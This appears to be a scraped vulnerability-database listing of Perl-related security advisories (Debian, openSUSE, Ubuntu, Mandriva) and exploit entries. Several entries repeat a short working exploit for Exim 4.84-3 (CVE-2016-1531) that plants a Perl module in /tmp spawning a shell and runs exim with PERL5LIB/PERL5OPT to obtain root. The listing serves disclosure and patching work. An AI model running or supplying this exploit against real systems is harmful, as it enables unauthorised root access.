Debian DLA-584-1 : libsys-syslog-perl security update

John Lightsey and Todd Rinaldo reported that the opportunistic loading of optional modules can make many programs unintentionally load code from the current working directory which might be changed to another directory without the user realising and potentially leading to privilege escalation, as...

[SECURITY] [DLA 584-1] libsys-syslog-perl security update

Package : libsys-syslog-perl Version : 0.29-1+deb7u1 CVE ID : CVE-2016-1238 John Lightsey and Todd Rinaldo reported that the opportunistic loading of optional modules can make many programs unintentionally load code from the current working directory which might be changed to another directory...

AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection

AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection Date: 03-14-2016 Exploit Author: BrianWGray Contact: https://twitter.com/BrianWGray WebPage: http://somethingbroken.com/ Vendor Homepage: https://www.akips.com/...

AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection

Exploit for perl platform in category web applications Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection Date: 03-14-2016 Exploit Author: BrianWGray Contact: https://twitter.com/BrianWGray WebPage: http://somethingbroken.com/ Vendor Homepage: https://www.akips.com/ Software Lin...

AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection

Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection Date: 03-14-2016 Exploit Author: BrianWGray Contact: https://twitter.com/BrianWGray WebPage: http://somethingbroken.com/ Vendor Homepage: https://www.akips.com/ Software Link: https://www.akips.com/showdoc/download Version: 15.3...

Exim 4.84-3 - Privilege Escalation

Exploit for windows platform in category local exploits !/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps 0day.today 2018-02-19...

Exim 4.84-3 - Local Privilege Escalation

!/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...

Exim 4.84-3 Local Root / Privilege Escalation

!/bin/sh CVE-2016-1531 exim /tmp/root.pm EOF package root; use strict; use warnings; system"/bin/sh"; EOF PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps...

openSUSE Security Update : perl-Module-Signature (openSUSE-2016-61)

This update to perl-Module-Signature 0.79 fixes the following security issues : - More protection of @INC from relative paths. CVE-2015-3409 - Fix GPG signature parsing logic. CVE-2015-3406 - MANIFEST.SKIP is no longer consulted unless --skip is given. CVE-2015-3407 - Properly use open modes to...

UBUNTU-CVE-2015-5667

Cross-site scripting XSS vulnerability in the HTML-Scrubber module before 0.15 for Perl, when the comment feature is enabled, allows remote attackers to inject arbitrary web script or HTML via a crafted comment...

DEBIAN-CVE-2015-5667

Cross-site scripting XSS vulnerability in the HTML-Scrubber module before 0.15 for Perl, when the comment feature is enabled, allows remote attackers to inject arbitrary web script or HTML via a crafted comment...

p5-HTML-Scrubber -- XSS vulnerability

MITRE reports: Cross-site scripting XSS vulnerability in the HTML-Scrubber module before 0.15 for Perl, when the comment feature is enabled, allows remote attackers to inject arbitrary web script or HTML via a crafted comment...

Debian DLA-320-1 : libemail-address-perl security update

Pali Rohr discovered 1 a possible DoS attack in any software which uses the Email::Address Perl module for parsing string input to a list of email addresses. By default Email::Address module, version v1.907 and all before tries to understand nestable comments in an input string with depth level 2...

[SECURITY] [DLA 320-1] libemail-address-perl security update

Package : libemail-address-perl Version : 1.889-2+deb6u2 Pali Rohár discovered 1 a possible DoS attack in any software which uses the Email::Address Perl module for parsing string input to a list of email addresses. By default Email::Address module, version v1.907 and all before tries to understa...

DLA-320-1 libemail-address-perl - security update

Bulletin has no description...

[SECURITY] [DLA 264-1] libmodule-signature-perl security update

Package : libmodule-signature-perl Version : 0.63-1+squeeze2 CVE ID : CVE-2015-3406 CVE-2015-3407 CVE-2015-3408 CVE-2015-3409 Debian Bug : 783451 John Lightsey discovered multiple vulnerabilities in Module::Signature, a Perl module to manipulate CPAN SIGNATURE files. The Common Vulnerabilities an...

[SECURITY] [DSA 3261-1] libmodule-signature-perl security update

------------------------------------------------------------------------- Debian Security Advisory DSA-3261-1 [email protected] http://www.debian.org/security/ Salvatore Bonaccorso May 15, 2015 http://www.debian.org/security/faq -...

DSA-3261-1 libmodule-signature-perl - security update

Bulletin has no description...

perl-Module-Signature content spoofing

Unsigned content can be interpreted as a signed...

[ MDVSA-2015:207 ] perl-Module-Signature

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mandriva Linux Security Advisory MDVSA-2015:207 http://www.mandriva.com/en/support/security/ Package : perl-Module-Signature Date : April 27, 2015 Affected: Business Server 1.0 Problem Description: Updated perl-Module-Signature package fixes the...